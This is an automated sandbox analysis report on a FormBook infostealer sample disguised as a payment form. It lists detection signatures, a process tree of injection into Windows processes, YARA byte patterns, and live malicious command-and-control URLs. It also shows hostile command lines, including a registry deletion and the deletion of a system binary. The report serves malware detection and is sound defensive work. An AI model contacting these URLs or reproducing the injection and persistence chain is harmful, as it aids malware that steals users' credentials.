Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Form_TT_EUR57,890.exe

Overview

General Information

Sample Name:Form_TT_EUR57,890.exe
Analysis ID:458655
MD5:811ea41e60760a97b5f28973618728fe
SHA1:ec072cb8cb67785ca7fba45d36c6264b7eed65cd
SHA256:e6bd5f8475731bcca5f6b74327a68ee4b7fa5b0662521feff1d92424da149151
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Form_TT_EUR57,890.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\Form_TT_EUR57,890.exe' MD5: 811EA41E60760A97B5F28973618728FE)
    • logagent.exe (PID: 5784 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Fdhlajk.exe (PID: 6148 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • mshta.exe (PID: 5732 cmdline: C:\Windows\System32\mshta.exe MD5: 7083239CE743FDB68DFC933B7308E80A)
        • Fdhlajk.exe (PID: 6496 cmdline: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' MD5: 811EA41E60760A97B5F28973618728FE)
          • secinit.exe (PID: 6044 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
        • rundll32.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6324 cmdline: /c del 'C:\Windows\SysWOW64\mshta.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • autoconv.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autoconv.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 2408 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
    • cmd.exe (PID: 1808 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4528 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2244 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6200 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\kjalhdF.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000003.437045703.0000000002DE4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0xe98:$file: URL=
  • 0xe7c:$url_explicit: [InternetShortcut]
0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 46 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.logagent.exe.10410000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.logagent.exe.10410000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.logagent.exe.10410000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        4.2.logagent.exe.10410000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.logagent.exe.10410000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 31 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, NewProcessName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, OriginalFileName: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: 'C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe' , ProcessId: 6148
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6200

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.mylifeinpark.com/6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8Avira URL Cloud: Label: malware
          Source: http://www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8Avira URL Cloud: Label: malware
          Source: http://www.trendyheld.com/6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeReversingLabs: Detection: 19%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Form_TT_EUR57,890.exeReversingLabs: Detection: 19%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: 4.0.logagent.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.logagent.exe.10410000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 29.2.secinit.exe.10410000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.2.mshta.exe.10410000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.0.mshta.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 29.0.secinit.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Form_TT_EUR57,890.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: Binary string: mshta.pdbGCTL source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000004.00000002.513978427.0000000004A5F000.00000040.00000001.sdmp, mshta.exe, 0000001A.00000003.468583820.0000000002D50000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: logagent.exe, mshta.exe, rundll32.exe, 0000001C.00000002.863838057.0000000004C90000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdb source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: mshta.exe, 0000001A.00000002.496580927.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: mshta.pdb source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov edx, dword ptr [eax]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov ebx, dword ptr [ecx]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor ecx, ecx
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then or edx, 00000080h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then or edx, 02h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then or edx, 01h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor eax, eax
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then xor eax, eax
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then test eax, 15000000h
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 4x nop then mov eax, dword ptr [ebx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
